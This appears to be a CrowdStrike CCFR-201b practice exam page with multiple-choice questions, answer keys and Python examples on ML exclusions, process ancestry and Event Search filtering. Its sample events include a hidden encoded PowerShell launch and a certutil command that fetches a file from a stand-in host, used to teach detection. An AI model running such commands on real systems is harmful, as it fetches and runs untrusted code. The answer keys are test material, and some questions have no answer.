Free CCFR-201b practice exam questions
In Falcon Search, what does the tag "suspicious behavior" typically indicate during a query?
- A . Malware installation
- B . Unusual process execution
- C . File encryption
- D . System reboot
The function of Machine Learning Exclusions is to___________.
- A . stop all detections for a specific pattern ID
- B . stop all sensor data collection for the matching path(s)
- C . stop all Machine Learning preventions, but a detection will still be generated and files will still be uploaded to the CrowdStrike Cloud
- D . stop all ML-based detections and preventions for the matching path(s) and/or stop files from being uploaded to the CrowdStrike Cloud
D
Explanation:
Machine Learning exclusions scope only the sensor's machine-learning engine, not its telemetry. A file or directory path that matches an exclusion pattern is no longer subject to ML-based detections and preventions, and the same exclusion can also stop matching files from being uploaded to the CrowdStrike Cloud for analysis; either effect or both can be selected. Event collection for the path continues, and detections from other engines (behavioral/IOA rules, hash-based indicators) are unaffected, which is why A and B are wrong and C understates what the exclusion does. Keep exclusion patterns as narrow as possible: everything they match is invisible to ML for as long as the rule exists.
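To make the scope of an exclusion concrete, here is an added example (not CrowdStrike code) that models a path-matching ML exclusion with the two effects answer D describes. The glob-style patterns, the `suppress_ml`/`suppress_upload` toggles and the sample policy are assumptions for the illustration, not the product's API.

```python
"""Model of what a Machine Learning exclusion suppresses, and what it does not.

Added example, not CrowdStrike code. Patterns are globs over the file path;
the two toggles mirror answer D above (stop ML detections/preventions, and/or
stop uploads). Assumed shape, not the Falcon API.
"""
import fnmatch
from dataclasses import dataclass


@dataclass(frozen=True)
class MlExclusion:
    pattern: str                   # glob over the file path, e.g. r"C:\Build\Agent\*"
    suppress_ml: bool = True       # stop ML-based detections AND preventions on matches
    suppress_upload: bool = False  # also stop matching files being uploaded to the cloud


def matches(exclusion: MlExclusion, path: str) -> bool:
    # Case-insensitive: Windows paths are case-insensitive in practice.
    return fnmatch.fnmatchcase(path.lower(), exclusion.pattern.lower())


def evaluate(path: str, exclusions: list[MlExclusion]) -> dict:
    """Return which sensor actions still happen for a file at `path`.

    Only the ML verdict and the cloud upload are in scope. Telemetry collection
    and detections from other engines (behavioral/IOA, hash indicators) are never
    touched by an ML exclusion, which is why answers A and B are wrong.
    """
    result = {
        "ml_detection": True,
        "ml_prevention": True,
        "upload": True,
        "telemetry": True,       # never suppressed by an ML exclusion
        "other_engines": True,   # never suppressed by an ML exclusion
        "matched": None,         # pattern that matched, if any
    }
    for exc in exclusions:
        if matches(exc, path):
            result["matched"] = exc.pattern
            if exc.suppress_ml:
                result["ml_detection"] = False
                result["ml_prevention"] = False
            if exc.suppress_upload:
                result["upload"] = False
    return result


# Constructed sample policy: a build agent excluded from ML and uploads,
# a packer directory excluded from ML only (samples still reach the cloud).
EXCLUSIONS = [
    MlExclusion(r"C:\Build\Agent\*", suppress_ml=True, suppress_upload=True),
    MlExclusion(r"C:\Tools\Packers\*\*.exe", suppress_ml=True, suppress_upload=False),
]

if __name__ == "__main__":
    for p in (r"C:\Build\Agent\bin\link.exe",
              r"C:\Tools\Packers\upx\upx.exe",
              r"C:\Users\Bob\Downloads\x.exe"):
        print(p, evaluate(p, EXCLUSIONS))
```

The `telemetry` and `other_engines` flags never change, which is the practical point: an exclusion silences the ML verdict on those paths, so a responder still has the process and file events to hunt with, but must not expect the sensor to block a malicious binary that happens to land under an excluded path.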
Which actions can be performed using RTR to remediate a threat on an infected host? (Choose two)
- A . Schedule a future system scan
- B . Delete malicious files
- C . Terminate malicious processes
- D . Reboot the entire CID
B, C
What role does collaboration play in event investigation?
- A . It is unnecessary and slows down the process
- B . It allows for sharing of tasks and expertise
- C . It complicates decision-making
- D . It focuses only on legal aspects
B
Which of the following actions can be performed directly from the search tool interface in Falcon?
- A . Engage with support
- B . Manage user roles
- C . Download event data
- D . Change account settings
What does the Full Detection Details option provide?
- A . It provides a visualization of program ancestry via the Process Tree View
- B . It provides a visualization of program ancestry via the Process Activity View
- C . It provides detailed list of detection events via the Process Table View
- D . It provides a detailed list of detection events via the Process Tree View
A
Explanation:
In the Falcon console, Full Detection Details opens the complete record of a detection: detection ID, severity, tactic, technique, description, and the events generated by the processes involved. Those events can be viewed in several layouts, including the Process Tree, Process Timeline and Process Activity views. The Process Tree View is the one that visualizes program ancestry, showing the parent-child and sibling relationships among the processes, with the event types and timestamps for each process. Options B, C and D each pair a view with content it does not show.
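The ancestry the Process Tree View draws can be rebuilt from process events, which is useful when you have exported event data rather than the console. The following is an added example, not Falcon code: the field names follow Falcon's ProcessRollup2 events (`aid`, `TargetProcessId`, `ParentProcessId`, `FileName`, `CommandLine`), while the event list itself is constructed for the illustration.

```python
"""Rebuild program ancestry (parent chain, siblings, tree) from process events.

Added example, not Falcon code. Field names follow ProcessRollup2 events;
the events below are constructed: a Word document spawns PowerShell, which
runs a certutil download.
"""
from collections import defaultdict

EVENTS = [  # constructed sample; a real export would also carry timestamps and more fields
    {"aid": "h1", "TargetProcessId": "100", "ParentProcessId": "1",
     "FileName": "explorer.exe", "CommandLine": "explorer.exe"},
    {"aid": "h1", "TargetProcessId": "200", "ParentProcessId": "100",
     "FileName": "WINWORD.EXE", "CommandLine": "WINWORD.EXE /n invoice.docm"},
    {"aid": "h1", "TargetProcessId": "210", "ParentProcessId": "100",
     "FileName": "chrome.exe", "CommandLine": "chrome.exe"},
    {"aid": "h1", "TargetProcessId": "300", "ParentProcessId": "200",
     "FileName": "powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"aid": "h1", "TargetProcessId": "400", "ParentProcessId": "300",
     "FileName": "certutil.exe", "CommandLine": "certutil.exe -urlcache -f http://example.invalid/p.txt p.exe"},
]


def index_processes(events):
    """Key each process by (aid, TargetProcessId) and build a parent -> children map.

    The aid is part of the key because process IDs are only unique per host.
    """
    by_id = {}
    children = defaultdict(list)
    for e in events:
        key = (e["aid"], e["TargetProcessId"])
        by_id[key] = e
        children[(e["aid"], e["ParentProcessId"])].append(key)
    return by_id, children


def ancestry(by_id, aid, pid):
    """Walk ParentProcessId upward; stop when the parent was never observed.

    Returns file names from the oldest known ancestor down to the process itself.
    """
    chain = []
    key = (aid, pid)
    seen = set()
    while key in by_id and key not in seen:
        seen.add(key)  # PID reuse can otherwise produce a cycle
        chain.append(by_id[key]["FileName"])
        key = (aid, by_id[key]["ParentProcessId"])
    return list(reversed(chain))


def siblings(by_id, children, aid, pid):
    """Other processes sharing the same parent (the sibling relationship in the tree view)."""
    parent = by_id[(aid, pid)]["ParentProcessId"]
    return [by_id[k]["FileName"] for k in children[(aid, parent)] if k != (aid, pid)]


def render_tree(by_id, children, aid, root_pid, depth=0):
    """Indented text rendering of the tree rooted at root_pid."""
    e = by_id[(aid, root_pid)]
    lines = ["  " * depth + f"{e['FileName']} (pid {root_pid}): {e['CommandLine']}"]
    for _, child_pid in children[(aid, root_pid)]:
        lines.extend(render_tree(by_id, children, aid, child_pid, depth + 1))
    return lines


if __name__ == "__main__":
    by_id, children = index_processes(EVENTS)
    print(" -> ".join(ancestry(by_id, "h1", "400")))
    print("\n".join(render_tree(by_id, children, "h1", "100")))
```

The `seen` guard matters on real data: PIDs are recycled, so a naive parent walk over a long export can loop. The chain `explorer.exe -> WINWORD.EXE -> powershell.exe -> certutil.exe` is the kind of ancestry that turns a bare certutil event into an obvious Office-macro download.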
Where can MITRE ATT&CK tactics and techniques be directly viewed in the Falcon platform?
- A . Process Timeline
- B . Full Detection Details
- C . Host Search Results
- D . Real Time Response Session
B
In the context of event investigation, what does the term "root cause analysis" refer to?
- A . The process of reinstalling software
- B . Identifying the underlying reason for an issue
- C . Updating systems to mitigate vulnerabilities
- D . Backing up data before an incident
B
To isolate anomalies in large event logs, responders should use __________ and conditional filters in Event Search.
- A . IOC tags
- B . Prevalence scores
- C . Logical operators
- D . Host groups
C
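The narrowing that logical operators give you in Event Search is easier to see when run over a handful of events. Below is an added example, not Falcon or Splunk code: it emulates AND, OR and NOT composition over conditional filters and applies it to constructed events whose field names follow Falcon's ProcessRollup2 schema (`event_simpleName`, `FileName`, `ParentBaseFileName`, `CommandLine`). The query itself is a constructed hunt, not a CrowdStrike-supplied rule.

```python
"""Compose conditional filters with AND / OR / NOT to isolate an anomaly.

Added example, not Falcon or Splunk code. Emulates the narrowing a responder
does in Event Search; events and the query are constructed for this example.
"""
import re

EVENTS = [  # constructed sample event log
    {"aid": "h1", "event_simpleName": "ProcessRollup2", "FileName": "powershell.exe",
     "ParentBaseFileName": "explorer.exe", "CommandLine": "powershell.exe Get-Date"},
    {"aid": "h1", "event_simpleName": "ProcessRollup2", "FileName": "powershell.exe",
     "ParentBaseFileName": "WINWORD.EXE", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"aid": "h2", "event_simpleName": "ProcessRollup2", "FileName": "powershell.exe",
     "ParentBaseFileName": "services.exe", "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"aid": "h2", "event_simpleName": "ProcessRollup2", "FileName": "cmd.exe",
     "ParentBaseFileName": "explorer.exe", "CommandLine": "cmd.exe /c dir"},
    {"aid": "h3", "event_simpleName": "DnsRequest", "DomainName": "example.invalid"},
]


# Conditional filters: each returns a predicate over one event.
def field_is(name, value):
    return lambda e: e.get(name, "").lower() == value.lower()


def field_matches(name, regex):
    pat = re.compile(regex, re.IGNORECASE)
    return lambda e: bool(pat.search(e.get(name, "")))


# Logical operators combining predicates.
def AND(*preds):
    return lambda e: all(p(e) for p in preds)


def OR(*preds):
    return lambda e: any(p(e) for p in preds)


def NOT(pred):
    return lambda e: not pred(e)


def search(events, pred):
    return [e for e in events if pred(e)]


# Constructed hunt: PowerShell launched with an encoded command or a hidden
# window, by a parent that is not one of the expected launchers.
QUERY = AND(
    field_is("event_simpleName", "ProcessRollup2"),
    field_is("FileName", "powershell.exe"),
    OR(
        field_matches("CommandLine", r"(^|\s)-(e|en|enc|encodedcommand)\b"),
        field_matches("CommandLine", r"-w(indowstyle)?\s+hidden"),
    ),
    NOT(OR(
        field_is("ParentBaseFileName", "explorer.exe"),
        field_is("ParentBaseFileName", "services.exe"),
    )),
)


def hunt(events=EVENTS):
    """Return (aid, parent, command line) for each event the composed query isolates."""
    return [(e["aid"], e["ParentBaseFileName"], e["CommandLine"]) for e in search(events, QUERY)]


if __name__ == "__main__":
    for hit in hunt():
        print(hit)
```

Each operator removes a class of noise: the event-type and file-name conditions drop everything that is not a PowerShell launch, the OR catches either suspicious flag, and the NOT over known-good parents is what separates the Word-spawned encoded command from routine interactive and scheduled PowerShell on the same hosts.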
Which Executive Summary dashboard item indicates sensors running with unsupported versions?
- A . Detections by Severity
- B . Inactive Sensors
- C . Sensors in RFM
- D . Active Sensors
C
Explanation:
In the Falcon console, the Executive Summary dashboard gives an overview of sensor health and activity, with items such as Active Sensors, Inactive Sensors, Detections by Severity and Sensors in RFM (Reduced Functionality Mode). RFM is the state a sensor enters when it cannot run with full functionality, most commonly because the host's operating system or kernel version is not supported by the installed sensor version. The dashboard shows the number and percentage of sensors in RFM together with the reason each one is in that state. Inactive Sensors counts hosts that have stopped checking in, which is a different health problem from an unsupported version, so B is a distractor.
